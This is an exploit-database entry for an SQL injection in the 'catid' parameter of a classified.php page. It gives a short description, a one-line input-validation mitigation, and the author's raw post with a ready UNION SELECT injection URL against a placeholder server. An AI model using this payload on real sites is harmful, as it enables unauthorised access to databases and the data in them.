header-logo
Suggest Exploit
vendor:
N/A
by:
MizoZ
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

MABROOK L3IIIIIIIIIID

This exploit allows an attacker to inject malicious SQL code into the 'catid' parameter of the classified.php page. This can be used to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in a SQL query.
Source

Exploit-DB raw data:

/*

Author          : MizoZ [from MA]
Group           : EvilWay, evilway[at]mail[dot]com
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka, Dyle !!

MABROOK L3IIIIIIIIIID

*/

The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--